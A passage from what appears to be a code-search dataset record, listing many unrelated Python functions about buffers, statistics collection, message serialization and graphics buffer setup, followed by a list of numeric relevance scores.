resource.getrusage(resource.RUSAGE_SELF)\n for name, field in rusage_fields:\n data = getattr(process, field, 'None')\n log.info('%s: %s', name, data)\n\n register_diags('Process Statistics', dump)", "def _allocate_buffer_memory(self):\n for channel in self._channels_dict.values():\n if channel.enabled:\n channel.allocate(self._num_captures, self._num_samples)", "def pc_output_buffers_full_avg(self, *args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full_avg(self, *args)", "def Register(parsed_flags):\n if not parsed_flags.perfspect:\n return\n logging.info('Registering PerfSpect telemetry collector')\n telemetry_collector = PerfspectCollector()\n events.before_phase.connect(\n telemetry_collector.Before, events.RUN_PHASE, weak=False)\n events.after_phase.connect(\n telemetry_collector.After, events.RUN_PHASE, weak=False)", "def __init__(self, n_taps, dtype='float'):\n self.buffer = np.zeros(n_taps, dtype)\n self.n_taps = n_taps", "def pc_output_buffers_full_var(self, 
*args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full_var(self, *args)", "def sendBuffer():\n dislin.sendbf()", "def Register(parsed_flags):\n if not parsed_flags.mpstat:\n return\n\n logging.debug('Registering mpstat collector.')\n\n collector = MpstatCollector(\n interval=parsed_flags.mpstat_interval,\n per_interval_samples=parsed_flags.mpstat_publish_per_interval_samples)\n events.before_phase.connect(collector.Start, stages.RUN, weak=False)\n events.after_phase.connect(collector.Stop, stages.RUN, weak=False)\n if parsed_flags.mpstat_publish:\n events.benchmark_samples_created.connect(collector.Analyze, weak=False)", "def _apply_buffers(node):\n buffers = \"\"\n total_mbufs = node[\"cpu\"][\"total_mbufs\"]\n\n # If the total mbufs is not 0 or less than the default, set num-bufs\n logging.debug(\"Total mbufs: {}\".format(total_mbufs))\n if total_mbufs != 0 and total_mbufs > 16384:\n buffers += \" buffers-per-numa {}\".format(total_mbufs)\n\n return buffers", "def buffer(\n self,\n distance,\n resolution=...,\n quadsegs=...,\n cap_style=...,\n join_style=...,\n mitre_limit=...,\n single_sided=...,\n ): # -> BaseGeometry:\n ...", "def update_link_statistics(self):\n if (self.track):\n key = self.id + \":\" + self.source + \"->\" + self.destination + \":\" \\\n + globals.BUFFEROCCUPANCY\n globals.statistics[key][globals.systime] = self.buffersize", "def to(self, *args, **kwargs):\n super()\n buffers = dict(self.named_buffers())\n if not isinstance(self._log_std, torch.nn.Parameter):\n self._log_std = buffers['log_std']\n self._min_std_param = buffers['min_std_param']\n self._max_std_param = buffers['max_std_param']", "def init_buffer(self):\n \n self.shape.buf = [pi3d.Buffer(self.shape, self.verts, self.texcoords, self.inds, self.norms)]\n self.shape.set_draw_details(self.shader, [self.spritesheet.img])", "def prepareUniformBuffers(self):\n # Vertex shader uniform buffer block\n uboVSSize = sum([glm.sizeof(ubo) for ubo in self.uboVS.values()])\n bufferInfo = vk.VkBufferCreateInfo(\n sType = vk.VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO,\n size = uboVSSize,\n # This buffer will be used as a uniform buffer\n usage = vk.VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT\n )\n # Create a new buffer\n self.uniformBufferVS['buffer'] = vk.vkCreateBuffer(self.device, bufferInfo, None)\n # Get memory requirements including size, alignment and memory type\n memReqs = vk.vkGetBufferMemoryRequirements(self.device, self.uniformBufferVS['buffer'])\n # Get the memory type index that supports host visibile memory access\n # Most implementations offer multiple memory types and selecting the correct one to allocate memory from is crucial\n # We also want the buffer to be host coherent so we don't have to flush (or sync after every update.\n #Note: This may affect performance so you might not want to do this in a real world application that updates buffers on a regular base\n allocInfo = vk.VkMemoryAllocateInfo(\n sType = vk.VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO,\n pNext = None,\n allocationSize = memReqs.size,\n memoryTypeIndex = self.vulkanDevice.getMemoryType(memReqs.memoryTypeBits, vk.VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | vk.VK_MEMORY_PROPERTY_HOST_COHERENT_BIT)\n )\n # Allocate memory for the uniform buffer\n self.uniformBufferVS['memory'] = vk.vkAllocateMemory(self.device, allocInfo, None)\n # Bind memory to buffer\n vk.vkBindBufferMemory(self.device, self.uniformBufferVS['buffer'], self.uniformBufferVS['memory'], 0)\n # Store information in the 
uniform's descriptor that is used by the descriptor set\n self.uniformBufferVS['descriptor'] = vk.VkDescriptorBufferInfo(\n buffer = self.uniformBufferVS['buffer'],\n offset = 0,\n range = uboVSSize\n )\n\n self.updateUniformBuffers()", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def stats(self, s_sample, d_sample, x_sample, wav_len):\n\t\tpass", "def store_from_other_buffer(self, buffer):\n assert self.ptr < self.max_size\n self.obs_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.obs_buf[:buffer.ptr]\n self.act_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.act_buf[:buffer.ptr]\n self.rew_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.rew_buf[:buffer.ptr]\n self.val_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.val_buf[:buffer.ptr]\n self.logp_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.logp_buf[:buffer.ptr]\n\n self.adv_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.adv_buf[:buffer.ptr]\n self.ret_buf[self.path_start_idx:self.path_start_idx + buffer.ptr] = buffer.ret_buf[:buffer.ptr]\n\n # Update internal index\n self.path_start_idx += buffer.ptr\n self.ptr += buffer.ptr", "def buffer_input(self, node, direction, values):\n self.num_buffered_inputs += len(values)\n self.buffered_input.setdefault(node, {}).setdefault(direction,\n []).extend(values)", "def _initialize_buffers(self) -> None:", "def _initialise_sufficient_statistics(self):\n stats = super()._initialise_sufficient_statistics()\n\n stats['B'] = {\n 'numer': [\n np.zeros((self.n_states, self.n_features[i]))\n for i in range(self.n_emissions)\n ],\n 'denom': [\n np.zeros((self.n_states, self.n_features[i]))\n for i in range(self.n_emissions)\n ],\n }\n\n return stats", "def fill_buffer_mono(self, block):\n\n if block.size < self.block_size:\n # print('Fill up last block')\n block = np.concatenate((block, np.zeros((1, (self.block_size - block.size)))), 1)\n\n if self.processCounter == 0:\n # insert first block to buffer\n self.buffer[self.block_size:self.block_size * 2] = block\n\n else:\n # shift buffer\n self.buffer = np.roll(self.buffer, -self.block_size)\n # insert new block to buffer\n self.buffer[self.block_size:self.block_size * 2] = block\n # shift FDLs\n self.FDL_left = np.roll(self.FDL_left, self.block_size + 1)\n self.FDL_right = np.roll(self.FDL_right, self.block_size + 1)\n\n # transform buffer into freq domain and copy to FDLs\n self.FDL_left[0:self.block_size + 1] = self.FDL_right[0:self.block_size + 1] = self.bufferFftPlan(\n self.buffer)", "def Set(collector: stats_collector.StatsCollector):\n global _stats_singleton\n\n with _init_lock:\n if _stats_singleton is None:\n _stats_singleton = collector\n for metadata in _metadatas:\n _stats_singleton.RegisterMetric(metadata)\n else:\n # TODO(user): Throw an exception instead, once it is confirmed that it\n # is ok to do so.\n logging.warning(\"Tried to re-initialize global stats collector.\")", "def 
reset_memory_statistics(sender, **kwargs): # pylint: disable=unused-argument\n MemoryUsageData.start_counting()", "def add(self, data):\n \n # Check buffer is active\n if self._settings['active'] == 'False':\n return\n \n # Timestamp = now\n timestamp = round(time.time(),2)\n \n self._log.debug(\"Server \" + \n self._settings['domain'] + self._settings['path'] + \n \" -> buffer data: \" + str(data) + \n \", timestamp: \" + str(timestamp))\n \n # Append data set [timestamp, [node, val1, val2, val3,...]] \n # to _data_buffer\n self._data_buffer.append([timestamp, data])", "def _writeBuffer(self, dataset, datasetName, buf, idxName, sparse=False):\n # compute end index\n if type(buf) is list:\n end = self.idxs[idxName] + len(buf)\n else:\n end = self.idxs[idxName] + buf.shape[0]", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _cache_silence_sample_data(self):\n self.silence_4_sample_buffer = self._synthesize_silence(4.0 * self.dot_time_in_msec)\n self.silence_2_sample_buffer = self._synthesize_silence(2.0 * self.dot_time_in_msec)\n self.silence_1_sample_buffer = self._synthesize_silence(self.dot_time_in_msec)", "def addChunk(self, direction):\n pass\n\n ## get size of actual map\n ## create array of fitting size\n ## stack created array to map", "def __init__(self, buffer_size):\n self.num_experiences = 0\n self.buffer = deque(maxlen=buffer_size)", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def add_histogram(self, tag, values, global_step=None, bins='tensorflow'):\n values = make_np(values)\n self.vis.histogram(make_np(values), opts={'title': tag})", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)\n self.last_recent_batch = 0", "def RegisterMetric(metadata):\n with _init_lock:\n _metadatas.append(metadata)\n if _stats_singleton is not None:\n _stats_singleton.RegisterMetric(metadata)", "def _cache_dot_dash_sample_data(self):\n self._get_pulse_shaping_waveform()\n self.dot_sample_buffer = self._synthesize_tone(self.dot_time_in_msec)\n self.dash_sample_buffer = self._synthesize_tone(3.0 * self.dot_time_in_msec)", "def _update_base_stats(self, base_stats):\n self.total_samples += base_stats[\"sample_size\"]\n self.sample = base_stats[\"sample\"]\n self._empty_line_count += base_stats[\"empty_line_count\"]\n self.memory_size += base_stats[\"memory_size\"]", "def generate_partial_statistics_in_memory(\n record_batch: pa.RecordBatch, options: stats_options.StatsOptions,\n stats_generators: List[stats_generator.CombinerStatsGenerator]\n) -> List[Any]:\n result = []\n if options.feature_allowlist:\n columns, features = [], []\n for feature_name in options.feature_allowlist:\n c = arrow_util.get_column(record_batch, feature_name, missing_ok=True)\n if c is not None:\n columns.append(c)\n features.append(feature_name)\n record_batch = pa.RecordBatch.from_arrays(columns, features)\n for generator in stats_generators:\n 
result.append(\n generator.add_input(generator.create_accumulator(), record_batch))\n return result", "def set_min_output_buffer(self, *args) -> \"void\":\n return _beamforming_swig.randomsampler_sptr_set_min_output_buffer(self, *args)", "def add_nfb_export_data(self, signal: dict):\n signal[\"fSmoothingFactor\"] = self.smoothingFactor()\n signal[\"method\"] = self.method()\n signal[\"sTemporalSmootherType\"] = self.smootherType()", "def stats(self, s_sample, d_sample, x_sample, wav_len):\n\t\ts_STMS_sample, d_STMS_sample, x_STMS_sample = self.transfrom_stats(s_sample,\n\t\t\td_sample, x_sample, wav_len)\n\t\tself.mag_map.stats(s_STMS_sample)", "def pc_output_buffers_full(self, *args) -> \"std::vector< float,std::allocator< float > >\":\n return _beamforming_swig.randomsampler_sptr_pc_output_buffers_full(self, *args)", "def reset(self):\r\n self.buffer = np.zeros(self.nBins)\r\n self.counter = 0", "def _init_buffers(self, v, n, _):\n super()._init_buffers(v, n, _)\n\n self.vbos.append(gl.glGenBuffers(1))\n\n # init VBO 2 - dynamic color data\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.vbos[3])\n loc = self.get_attribute_location(\"carried\")\n gl.glEnableVertexAttribArray(loc)\n gl.glVertexAttribPointer(loc, 1, gl.GL_FLOAT, gl.GL_FALSE, 0, ctypes.c_void_p(0))\n gl.glVertexAttribDivisor(loc, 1)\n gl.glBufferData(gl.GL_ARRAY_BUFFER, 0, np.array([], dtype=np.float32), gl.GL_DYNAMIC_DRAW)", "def buffer(self, distance):\n return _unary_geo(arctern.ST_Buffer, self, distance)", "def _tobuffer(self, object_):\n\n raise NotImplementedError", "def __init__(self, buffer_size, random_seed=None):\n self.buffer_size = buffer_size\n self.count = 0\n self.oldPos = 0\n self.currPos = 0\n self.full = False\n self.buffer = []\n self.featCount = 3\n random.seed(random_seed)\n self.useSubBuffer = False", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2I4d().pack(_x.h_min, _x.h_max, _x.s_min, _x.s_max, _x.v_min, _x.v_max))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _report(self, registry=None, timestamp=None, flush_current_hist=False):\n registry = registry or self.registry\n if self.enable_runtime_metrics:\n col = runtime_metrics.RuntimeCollector(registry)\n col.collect()\n metrics = registry.dump_metrics()\n for key in metrics.keys():\n metric_name, metric_tags = self.decode_key(key)\n tags = self.tags\n if metric_tags:\n tags = self.tags.copy()\n tags.update(metric_tags)\n\n wf_hist = wavefront_histogram.get(key, registry)\n if wf_hist is not None:\n distributions = wf_hist.get_distribution()\n if flush_current_hist:\n distributions.extend(\n wf_hist.get_current_minute_distribution())\n for dist in distributions:\n self.wavefront_client.send_distribution(\n name=f'{self.prefix}{metric_name}',\n centroids=dist.centroids,\n histogram_granularities=self.histogram_granularities,\n timestamp=dist.timestamp,\n source=self.source,\n tags=tags)\n continue\n\n is_delta = delta.is_delta_counter(key, registry)\n for value_key in metrics[key].keys():\n if is_delta:\n self.wavefront_client.send_delta_counter(\n name=delta.get_delta_name(self.prefix, metric_name,\n value_key),\n value=metrics[key][value_key], source=self.source,\n tags=tags\n )\n # decrement delta counter\n registry.counter(key).dec(metrics[key][value_key])\n else:\n 
self.wavefront_client.send_metric(\n name=f'{self.prefix}{metric_name}.{value_key}',\n value=metrics[key][value_key], timestamp=timestamp,\n source=self.source, tags=tags)", "def __init__(self, buffer_size, batch_size, num_agents, seed):\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.batch_size = batch_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)", "def stats(self, s_sample, d_sample, x_sample, wav_len):\n\t\tpass\n\t\t# s_STMS_sample, d_STMS_sample, x_STMS_sample = self.transfrom_stats(s_sample,\n\t\t# \td_sample, x_sample, wav_len)\n\t\t# smm_sample = tf.math.truediv(s_STMS_sample, x_STMS_sample)\n\t\t# self.smm_map.stats(smm_sample)", "def _make_buffer(self, width, height):\n fb_prop = p3d.FrameBufferProperties(p3d.FrameBufferProperties.get_default())\n fb_prop.set_multisamples(self._multisamples)\n fb_prop.set_srgb_color(self._srgb_color)\n\n self._buffer = self._engine.make_output(\n self._pipe, name=\"offscreen\", sort=0,\n fb_prop=p3d.FrameBufferProperties.get_default(),\n win_prop=p3d.WindowProperties(size=(width, height)),\n flags=p3d.GraphicsPipe.BFRefuseWindow)\n\n self._region = self._buffer.make_display_region()\n\n self._depth_tex = p3d.Texture()\n self._depth_tex.setFormat(p3d.Texture.FDepthComponent)\n self._buffer.addRenderTexture(\n self._depth_tex, p3d.GraphicsOutput.RTMCopyRam, p3d.GraphicsOutput.RTPDepth)\n\n self._color_tex = p3d.Texture()\n self._color_tex.setFormat(p3d.Texture.FRgba8)\n self._buffer.addRenderTexture(\n self._color_tex, p3d.GraphicsOutput.RTMCopyRam, p3d.GraphicsOutput.RTPColor)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def _init_plot_buffer(self, configuration):\n if not isinstance(configuration, dict):\n configuration = { 'length': configuration }\n\n # initialize vao/vbo\n vao, vbo = util.VAO(), util.VBO()\n\n # put kernel function into vertex shader\n vertex_shader_kernel = open(SHADER_DIR+'/data.vert.glsl').read()\n if configuration['kernel'] is not None:\n vertex_shader_kernel = vertex_shader_kernel.replace(\n self.KERNEL_PLACEHOLDER,\n configuration['kernel'])\n\n shader = util.Shader(\n vertex=vertex_shader_kernel,\n geometry=open(SHADER_DIR+'/data.geom.glsl').read(),\n fragment=open(SHADER_DIR+'/data.frag.glsl').read(),\n link=True\n )\n norm = configuration.get('norm', float)\n buffer_configuration = {\n 'byte_count': configuration['length'] * 4,\n 'vertex_count': configuration['length']/2,\n 'point_base_color': configuration.get('point_base_color', [0,0,0.5,1]),\n 'point_size': configuration.get('point_size', norm(2.0/configuration['length'])),\n 'vao': vao,\n 'vbo': vbo,\n 'shader': shader\n }\n\n # uniforms\n shader.uniform('mat_plane', self._mat_plot)\n shader.uniform('geometry_color', buffer_configuration['point_base_color'])\n shader.uniform('dot_size', buffer_configuration['point_size'])\n\n # configure vbo\n with vbo.get(0):\n vertex_position = shader.attributeLocation('vertex_position')\n glBufferData(GL_ARRAY_BUFFER, buffer_configuration['byte_count'], None, GL_STATIC_DRAW)\n with vao:\n glVertexAttribPointer(vertex_position, 2, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(0)\n\n return 
buffer_configuration", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def serialize(self, buff):\n try:\n _x = self.Class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _refresh_buffers(self) -> None:", "def pack(self,buffer):\n buffer.append(self.data)", "def __init__(self, buffer_size, random_seed=0):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)", "def __allgather_like(\n self,\n func: Callable,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n axis: int,\n **kwargs,\n ):\n # dummy allocation for *v calls\n # ToDO: Propper implementation of usage\n send_counts, send_displs, recv_counts, recv_displs = None, None, None, None\n\n # unpack the send buffer\n if isinstance(sendbuf, tuple):\n sendbuf, send_counts, send_displs = sendbuf\n if isinstance(sendbuf, DNDarray):\n sendbuf = sendbuf.larray\n if not isinstance(sendbuf, torch.Tensor) and axis != 0:\n raise TypeError(\n f\"sendbuf of type {type(sendbuf)} does not support concatenation axis != 0\"\n )\n # unpack the receive buffer\n if isinstance(recvbuf, tuple):\n recvbuf, recv_counts, recv_displs = recvbuf\n if isinstance(recvbuf, DNDarray):\n recvbuf = recvbuf.larray\n if not isinstance(recvbuf, torch.Tensor) and axis != 0:\n raise TypeError(\n f\"recvbuf of type {type(recvbuf)} does not support concatenation axis != 0\"\n )\n\n # keep a reference to the original buffer object\n original_recvbuf = recvbuf\n sbuf_is_contiguous, rbuf_is_contiguous = None, None\n # permute the send_axis order so that the split send_axis is the first to be transmitted\n if axis != 0:\n send_axis_permutation = list(range(sendbuf.ndimension()))\n send_axis_permutation[0], send_axis_permutation[axis] = axis, 0\n sendbuf = sendbuf.permute(*send_axis_permutation)\n sbuf_is_contiguous = False\n\n recv_axis_permutation = list(range(recvbuf.ndimension()))\n recv_axis_permutation[0], recv_axis_permutation[axis] = axis, 0\n recvbuf = recvbuf.permute(*recv_axis_permutation)\n rbuf_is_contiguous = False\n else:\n recv_axis_permutation = None\n\n sbuf = sendbuf if CUDA_AWARE_MPI or not isinstance(sendbuf, 
torch.Tensor) else sendbuf.cpu()\n rbuf = recvbuf if CUDA_AWARE_MPI or not isinstance(recvbuf, torch.Tensor) else recvbuf.cpu()\n\n # prepare buffer objects\n if sendbuf is MPI.IN_PLACE or not isinstance(sendbuf, torch.Tensor):\n mpi_sendbuf = sbuf\n else:\n mpi_sendbuf = self.as_buffer(sbuf, send_counts, send_displs, sbuf_is_contiguous)\n if send_counts is not None:\n mpi_sendbuf[1] = mpi_sendbuf[1][0][self.rank]\n\n if recvbuf is MPI.IN_PLACE or not isinstance(recvbuf, torch.Tensor):\n mpi_recvbuf = rbuf\n else:\n mpi_recvbuf = self.as_buffer(rbuf, recv_counts, recv_displs, rbuf_is_contiguous)\n if recv_counts is None:\n mpi_recvbuf[1] //= self.size\n # perform the scatter operation\n exit_code = func(mpi_sendbuf, mpi_recvbuf, **kwargs)\n return exit_code, sbuf, rbuf, original_recvbuf, recv_axis_permutation", "def add_to_buffer(self, values):\n self._buffer.extend(values)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def __init__(self, max_entries, buffer_config):\n self.max_entries = max_entries\n \n self.data_dict = dict()\n for key, val in buffer_config.items():\n if (type(val) == int):\n shape = (self.max_entries, val)\n elif (type(val) == tuple):\n shape = (self.max_entries,) + val\n else:\n raise Exception(\"Not a valid buffer_config.\")\n self.data_dict[key] = np.zeros(shape)\n\n self.start_idx = 0\n self.num_entries = 0", "def _sample_indication(self, buf, addr):\n #print 'Buffer, Address:', buf, addr\n try:\n #We may be (or may not be!) in need of translating our data with: hexlify or unhexlify. \n data = hexlify(str(buf))\n print 'RAW data: ', buf\n print 'heXlify data: ', data\n except:\n traceback.print_exc()\n self.property_set('data_channel', Sample(0, str(data), 'hex'))", "def __init__(self, buffer_size, batch_size, random_seed=1234):\n self.tree = PER.sum_tree.SumTree(buffer_size)\n self.batch_size = batch_size\n self.episode = []\n self.s_prev, self.s_ori_prev, self.a_prev, self.r_prev, self.v_prev, self.distribution, self.mask = \\\n None, None, None, None, None, None, None\n\n # p_i = (p + e)^a\n self.e = 0.00000001\n self.a = 0.6 # values suggested by authors\n self.beta = 0.4 # to 1 - values suggested by authors\n\n self.previous_index = None # TODO\n random.seed(random_seed)", "def set(self, i, buf):\n self.buf = buf\n self.buf_i = i\n self.avg = None if len(buf) == 0 else (sum(buf) / len(buf))", "def add(self, stats):\n self.n += stats.n\n self.loss += stats.loss\n self.accuracy += stats.accuracy\n self.grad_norm = max(self.grad_norm, stats.grad_norm)" ]
[ "0.51819456", "0.5043784", "0.49926385", "0.4946909", "0.49447924", "0.49344134", "0.4884747", "0.4879836", "0.48627967", "0.48563662", "0.48147842", "0.47965068", "0.478542", "0.47853506", "0.47853506", "0.47853506", "0.47518125", "0.4747054", "0.47394067", "0.47262183", "0.47090402", "0.46921518", "0.4690415", "0.46888068", "0.46444273", "0.46443155", "0.46159935", "0.45845237", "0.45827752", "0.45766237", "0.45754996", "0.4555112", "0.45486367", "0.45222935", "0.45174807", "0.45113292", "0.44989887", "0.44916773", "0.4486421", "0.44861734", "0.44837", "0.4477309", "0.44673946", "0.44634074", "0.44605765", "0.44529518", "0.4445916", "0.44332668", "0.44286054", "0.44270113", "0.4426935", "0.44128686", "0.44120482", "0.440753", "0.4395778", "0.43851164", "0.43849263", "0.43790245", "0.43759242", "0.43674827", "0.43658814", "0.43615767", "0.43609047", "0.4357091", "0.43558693", "0.43532503", "0.4352153", "0.43509862", "0.4349529", "0.43443254", "0.43299758", "0.4324603", "0.43183723", "0.43094978", "0.43067598", "0.42958173", "0.42896312", "0.42895344", "0.42774045", "0.42762828", "0.42730883", "0.42696407", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.4267263", "0.42607692", "0.42594817", "0.42591852", "0.4258335", "0.42537183", "0.42518082", "0.42446023", "0.42444953", "0.42429477", "0.42389432", "0.4237158", "0.42306983" ]
0.67643166
0
Initialize Style MelGAN discriminator.
def __init__( self, repeats=2, window_sizes=[512, 1024, 2048, 4096], pqmf_params=[ [1, None, None, None], [2, 62, 0.26700, 9.0], [4, 62, 0.14200, 9.0], [8, 62, 0.07949, 9.0], ], discriminator_params={ "out_channels": 1, "kernel_sizes": [5, 3], "channels": 16, "max_downsample_channels": 512, "bias": True, "downsample_scales": [4, 4, 4, 1], "nonlinear_activation": "LeakyReLU", "nonlinear_activation_params": {"negative_slope": 0.2}, "pad": "ReflectionPad1d", "pad_params": {}, }, use_weight_norm=True, ): super().__init__() # window size check assert len(window_sizes) == len(pqmf_params) sizes = [ws // p[0] for ws, p in zip(window_sizes, pqmf_params)] assert len(window_sizes) == sum([sizes[0] == size for size in sizes]) self.repeats = repeats self.window_sizes = window_sizes self.pqmfs = torch.nn.ModuleList() self.discriminators = torch.nn.ModuleList() for pqmf_param in pqmf_params: d_params = copy.deepcopy(discriminator_params) d_params["in_channels"] = pqmf_param[0] if pqmf_param[0] == 1: self.pqmfs += [torch.nn.Identity()] else: self.pqmfs += [PQMF(*pqmf_param)] self.discriminators += [BaseDiscriminator(**d_params)] # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n super(Discriminator, self).__init__()\n\n # Use stride in convolutions to downsample image to size 1\n\n # Using BatchNorm2d 0.8 for stability based on reading of https://github.com/eriklindernoren/PyTorch-GAN code\n layers = [nn.Conv2d(512, 1, kernel_size=4, stride=1, padding=0, bias=True),\n nn.Flatten(), nn.Sigmoid()]\n for i in range(3):\n out_chans = int(512 / (2 ** i))\n in_chans = int(out_chans / 2)\n layers.insert(0, nn.LeakyReLU(0.2, inplace=True))\n layers.insert(0, nn.BatchNorm2d(out_chans, 0.8))\n layers.insert(0, nn.Conv2d(in_chans, out_chans, kernel_size=4, stride=2, padding=1, bias=False))\n layers.insert(0, nn.LeakyReLU(0.2, inplace=True))\n layers.insert(0, nn.BatchNorm2d(64, 0.8))\n layers.insert(0, nn.Conv2d(3, 64, kernel_size=4, stride=2, padding=1, bias=False))\n print(layers)\n self.network = nn.Sequential(*layers)", "def __init__(self, input_nc=3, ndf=64, n_layers=3, norm_type='spectral'):\n super(Discriminator_PatchGAN, self).__init__()\n self.n_layers = n_layers\n norm_layer = self.get_norm_layer(norm_type=norm_type)\n kw = 4\n padw = int(np.ceil((kw - 1.0) / 2))\n sequence = [[self.use_spectral_norm(nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), norm_type), nn.LeakyReLU(0.2, True)]]\n nf = ndf\n for n in range(1, n_layers):\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw), norm_type), norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=1, padding=padw), norm_type), norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n sequence += [[self.use_spectral_norm(nn.Conv2d(nf, 1, kernel_size=kw, stride=1, padding=padw), norm_type)]]\n self.model = nn.Sequential()\n for n in range(len(sequence)):\n self.model.add_module('child' + str(n), nn.Sequential(*sequence[n]))\n self.model.apply(self.weights_init)", "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def __init__(self,opt):\n super(SNPatchDiscriminator, self).__init__()\n # if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n # use_bias = norm_layer.func == nn.InstanceNorm2d\n # else:\n # use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n n_layers = 3\n ndf = opt.ndf\n use_bias = True\n sequence = [nn.utils.spectral_norm(nn.Conv2d(opt.input_nc, ndf, kernel_size=kw, stride=2, padding=padw)), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 4)\n sequence += [\n nn.utils.spectral_norm(nn.Conv2d(ndf * nf_mult_prev, ndf * 